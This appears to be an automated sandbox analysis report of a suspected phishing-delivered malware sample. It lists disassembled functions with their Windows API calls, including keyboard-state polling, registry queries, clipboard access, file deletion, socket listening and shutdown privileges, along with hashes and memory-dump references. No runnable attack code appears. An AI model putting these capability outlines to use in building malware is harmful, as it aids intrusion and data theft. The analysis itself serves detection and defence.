            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
            • API String ID: 0-4052911093
            • Opcode ID: 1d6a6d26ef80c2c87edf66c9d5a2e3c0ebbcf4fc34b55724b4641b3e11472f40
            • Instruction ID: 62966f3159437930ad81ff5217b5b76c420532e73774a0d1e79d563570489851
            • Opcode Fuzzy Hash: 1d6a6d26ef80c2c87edf66c9d5a2e3c0ebbcf4fc34b55724b4641b3e11472f40
            • Instruction Fuzzy Hash: D4727E71E002199BDF24CF59C8947AEB7B5FF48310F19816AE959EB390E7309E81DB90
            Function 00D00665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00D010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D00038,?,?), ref: 00D010BC
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00737
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D007D6
            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D0086E
            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00D00AAD
            • RegCloseKey.ADVAPI32(00000000), ref: 00D00ABA
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
            • String ID:
            • API String ID: 1240663315-0
            • Opcode ID: 403fed1eb5c66952d932c029a9a2693b92e177179306f1bfaa870fda9b96c98c
            • Instruction ID: 697e00bdc7072dcb50eeef29410b1cc8c0e5f2ad8bc8077ad79d54c1e8d31be4
            • Opcode Fuzzy Hash: 403fed1eb5c66952d932c029a9a2693b92e177179306f1bfaa870fda9b96c98c
            • Instruction Fuzzy Hash: 34E12C71204310AFCB14DF24C895F6ABBE4EF89714F18856DF48ADB2A2DB30E905DB61
            Function 00CE0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
            Download Yara Rule
            APIs
            • GetKeyboardState.USER32(?), ref: 00CE0241
            • GetAsyncKeyState.USER32(000000A0), ref: 00CE02C2
            • GetKeyState.USER32(000000A0), ref: 00CE02DD
            • GetAsyncKeyState.USER32(000000A1), ref: 00CE02F7
            • GetKeyState.USER32(000000A1), ref: 00CE030C
            • GetAsyncKeyState.USER32(00000011), ref: 00CE0324
            • GetKeyState.USER32(00000011), ref: 00CE0336
            • GetAsyncKeyState.USER32(00000012), ref: 00CE034E
            • GetKeyState.USER32(00000012), ref: 00CE0360
            • GetAsyncKeyState.USER32(0000005B), ref: 00CE0378
            • GetKeyState.USER32(0000005B), ref: 00CE038A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: State$Async$Keyboard
            • String ID:
            • API String ID: 541375521-0
            • Opcode ID: 9710d46392b1532ce20999bce0f95ea9712f07c852e8a313447987488c98e6f0
            • Instruction ID: db8a65429ac38549334f251a72de6bda92f2ccaeaac6cf3bb77e91c6a0d7d0a2
            • Opcode Fuzzy Hash: 9710d46392b1532ce20999bce0f95ea9712f07c852e8a313447987488c98e6f0
            • Instruction Fuzzy Hash: C141C8245047CA6EFF318B66D8083A5BEE06F12340F68409DD6D6466D3EBE45BC887E2
            Function 00CF86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
            • CoInitialize.OLE32 ref: 00CF8718
            • CoUninitialize.OLE32 ref: 00CF8723
            • CoCreateInstance.OLE32(?,00000000,00000017,00D12BEC,?), ref: 00CF8783
            • IIDFromString.OLE32(?,?), ref: 00CF87F6
            • VariantInit.OLEAUT32(?), ref: 00CF8890
            • VariantClear.OLEAUT32(?), ref: 00CF88F1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
            • API String ID: 834269672-1287834457
            • Opcode ID: db37034f1ba80820e9946c778e4858ac3d7671a1391416196287954e78c1e3d8
            • Instruction ID: 89067121571d892fb3ad627aca34f865c01586b416f534af2f76e30ce531492c
            • Opcode Fuzzy Hash: db37034f1ba80820e9946c778e4858ac3d7671a1391416196287954e78c1e3d8
            • Instruction Fuzzy Hash: AF61BD706083059FC750EF25C848B6ABBE4EF48754F14481EFA959B291CB30ED48CBA3
            Function 00CF4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
            • String ID:
            • API String ID: 1737998785-0
            • Opcode ID: 1ebacdc0898ee450f6a95e311b03978678abe01c0d38c946ca6ab664f1be901a
            • Instruction ID: 4d376a91ee1c7fc9ea11cae0cf551dc5204e17269d043424db1de75317e0bbc8
            • Opcode Fuzzy Hash: 1ebacdc0898ee450f6a95e311b03978678abe01c0d38c946ca6ab664f1be901a
            • Instruction Fuzzy Hash: 4A21A635200314AFDB24AF64EC49B7A7BA9EF44714F24801AF94AD7361CB71ED00DB69
            Function 00CE3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C848A1,?,?,00C837C0,?), ref: 00C848CE
              • Part of subcall function 00CE4CD3: GetFileAttributesW.KERNEL32(?,00CE3947), ref: 00CE4CD4
            • FindFirstFileW.KERNEL32(?,?), ref: 00CE3ADF
            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00CE3B87
            • MoveFileW.KERNEL32(?,?), ref: 00CE3B9A
            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00CE3BB7
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE3BD9
            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00CE3BF5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
            • String ID: \*.*
            • API String ID: 4002782344-1173974218
            • Opcode ID: 87f97dd80402eb5c1f1b3f7ca32cf2b67c54a1f64982adf0f8af023b20974194
            • Instruction ID: d9b3e75ef71d9cae064ef91247a8e09046302a1223e48630a76f28665aa724f4
            • Opcode Fuzzy Hash: 87f97dd80402eb5c1f1b3f7ca32cf2b67c54a1f64982adf0f8af023b20974194
            • Instruction Fuzzy Hash: AF51A33180128D9BCF15FBA1CD969EDB7B8AF14304F6441A5E402B7191EF30AF09EB64
            Function 00CEF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00CEF6AB
            • Sleep.KERNEL32(0000000A), ref: 00CEF6DB
            • _wcscmp.LIBCMT ref: 00CEF6EF
            • _wcscmp.LIBCMT ref: 00CEF70A
            • FindNextFileW.KERNEL32(?,?), ref: 00CEF7A8
            • FindClose.KERNEL32(00000000), ref: 00CEF7BE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
            • String ID: *.*
            • API String ID: 713712311-438819550
            • Opcode ID: e52b23d25d01ad4f0ac98d8427e4be111cd0034da165646409552ffd3365202b
            • Instruction ID: 550e7633ab52d83d58cb2aa5dd82e8865193ca89124ff95b3414949893d774e6
            • Opcode Fuzzy Hash: e52b23d25d01ad4f0ac98d8427e4be111cd0034da165646409552ffd3365202b
            • Instruction Fuzzy Hash: 1041707190024A9FCF15EF65CC89AEEBBB4FF05314F14456AF815A32A0EB309E45DBA0
            Function 00C94140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
            • API String ID: 0-1546025612
            • Opcode ID: acb40252f7f869e810bae4da7d7ed1a1502a0cbcdf857afde24445652c4b17f5
            • Instruction ID: 38e53616dbe6d453ef66f3d98208744635ec1cc96c458f4b6b44b8b3b29d55aa
            • Opcode Fuzzy Hash: acb40252f7f869e810bae4da7d7ed1a1502a0cbcdf857afde24445652c4b17f5
            • Instruction Fuzzy Hash: B9A27070E0421ACBDF28CF59C994FADB7B1FB54314F1482AAD866A7680D7309E86DF50
            Function 00C958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove
            • String ID:
            • API String ID: 4104443479-0
            • Opcode ID: 21dec7b8631acfc810297c77458c49302d29836d923cdbaf4072242acc63c456
            • Instruction ID: fab68669dd1ab4779f0ee2b3c1d35b191a0afcc6fcf92e18ac27db939e7e4399
            • Opcode Fuzzy Hash: 21dec7b8631acfc810297c77458c49302d29836d923cdbaf4072242acc63c456
            • Instruction Fuzzy Hash: 1112AC70A00609EFDF04DFA9D985AAEB3F5FF48304F20412AE406E7291EB35AE15DB54
            Function 00CE545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CD8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD8D0D
              • Part of subcall function 00CD8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD8D3A
              • Part of subcall function 00CD8CC3: GetLastError.KERNEL32 ref: 00CD8D47
            • ExitWindowsEx.USER32(?,00000000), ref: 00CE549B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
            • String ID: $@$SeShutdownPrivilege
            • API String ID: 2234035333-194228
            • Opcode ID: e780873a72445588bcb5264dd0fcb78663e7f550205edd3107a2f3ed99cec648
            • Instruction ID: ba1e803af3541d5a90608c61c5dcfaf74b26ccb5733dcc6a98d4f74853f07c57
            • Opcode Fuzzy Hash: e780873a72445588bcb5264dd0fcb78663e7f550205edd3107a2f3ed99cec648
            • Instruction Fuzzy Hash: C5014232654B856AF738637BEC4ABBA7258EB00746F300021FD1AE21C3EA901C8082A0
            Function 00CF6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
            Download Yara Rule
            APIs
            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CF65EF
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF65FE
            • bind.WSOCK32(00000000,?,00000010), ref: 00CF661A
            • listen.WSOCK32(00000000,00000005), ref: 00CF6629
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6643
            • closesocket.WSOCK32(00000000,00000000), ref: 00CF6657
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLast$bindclosesocketlistensocket
            • String ID:
            • API String ID: 1279440585-0
            • Opcode ID: 6f523caf925756e4ed5d3d809b114e00b25a898ea2449d5cefc2e352327d9d30
            • Instruction ID: 2526ad5adea2cc5ed8bf9a3d3587bfddace841c60797ba8497b51161ee7702e5
            • Opcode Fuzzy Hash: 6f523caf925756e4ed5d3d809b114e00b25a898ea2449d5cefc2e352327d9d30
            • Instruction Fuzzy Hash: F9217E316002049FCB50EF64C885B7EB7A9EF44724F248159FA6AE73D1CB70AD05DB66
            Function 00C95680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
            • _memmove.LIBCMT ref: 00CD062F
            • _memmove.LIBCMT ref: 00CD0744
            • _memmove.LIBCMT ref: 00CD07EB
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove$Exception@8Throwstd::exception::exception
            • String ID:
            • API String ID: 1300846289-0
            • Opcode ID: e84360dee035968c39a837f9ce369cf76b153b968d07cc9cbab6249ba2fdeec2
            • Instruction ID: d0244f1df78465ada4f25174cf40b2cb4d3180e5bc96b4974358cf80ef800abe
            • Opcode Fuzzy Hash: e84360dee035968c39a837f9ce369cf76b153b968d07cc9cbab6249ba2fdeec2
            • Instruction Fuzzy Hash: C102A170A00205DFCF04DF68D985AAEBBB5FF44304F24806AE806DB395EB31DA55DB95
            Function 00C81287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C819FA
            • GetSysColor.USER32(0000000F), ref: 00C81A4E
            • SetBkColor.GDI32(?,00000000), ref: 00C81A61
              • Part of subcall function 00C81290: DefDlgProcW.USER32(?,00000020,?), ref: 00C812D8
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ColorProc$LongWindow
            • String ID:
            • API String ID: 3744519093-0
            • Opcode ID: 4694d71a1847eb4a198020010b584dcc2b39af813336db4c02cefbcfd5763fdc
            • Instruction ID: ef20394e886af0c0fff56a9260a035e7121efa01fc16ec1e376093d2f71b64b1
            • Opcode Fuzzy Hash: 4694d71a1847eb4a198020010b584dcc2b39af813336db4c02cefbcfd5763fdc
            • Instruction Fuzzy Hash: 95A105B1111544BFD628BB2ACC49EFF29DDDB42349F1C021AF812D61D1CA54DE02A37A
            Function 00CF6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CF80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CF80CB
            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CF6AB1
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6ADA
            • bind.WSOCK32(00000000,?,00000010), ref: 00CF6B13
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF6B20
            • closesocket.WSOCK32(00000000,00000000), ref: 00CF6B34
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorLast$bindclosesocketinet_addrsocket
            • String ID:
            • API String ID: 99427753-0
            • Opcode ID: 796cda1775e7a00ff93adb5eeec2c51b12b4bc1d07aeac45e47314bf88ed7029
            • Instruction ID: 9d422b7c03fb3ab91074f49a731a07e62b2a1edf0bb7a2e0d72008a83c71f934
            • Opcode Fuzzy Hash: 796cda1775e7a00ff93adb5eeec2c51b12b4bc1d07aeac45e47314bf88ed7029
            • Instruction Fuzzy Hash: A441CF75600214AFEB10BF64DC86F7E77A8DB44714F44805CFA5AAB3C2DB74AD00A796
            Function 00D055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$EnabledForegroundIconicVisibleZoomed
            • String ID:
            • API String ID: 292994002-0
            • Opcode ID: f50ae0e4826800aaba9cbb110f66a856fe873fb5ea78581acb9a391f225469f5
            • Instruction ID: 34c3cfd4f87e5b51c20ead8c304445b3e9504059a709c47a7abad577b76655f8
            • Opcode Fuzzy Hash: f50ae0e4826800aaba9cbb110f66a856fe873fb5ea78581acb9a391f225469f5
            • Instruction Fuzzy Hash: E3119031700A116BE7216F26EC44B6B7798EF44721B984429E84ED7281CB7199018AB5
            Function 00CFC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,00CC1D88,?), ref: 00CFC312
            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CFC324
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: GetSystemWow64DirectoryW$kernel32.dll
            • API String ID: 2574300362-1816364905
            • Opcode ID: 6d0a52adf2d8728f6b1a6eb5ec10faac40e6d86de0b8afe58a087d9bd7b64823
            • Instruction ID: fde74425f7e518a4965113a9b662a04283fecb6405357371c86cca3c357f5fed
            • Opcode Fuzzy Hash: 6d0a52adf2d8728f6b1a6eb5ec10faac40e6d86de0b8afe58a087d9bd7b64823
            • Instruction Fuzzy Hash: 0BE08C7430030BCFCB344F25C844BD676D4EB08394FA08439E9A9D2660E7B0D844CAB1
            Function 00C93190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
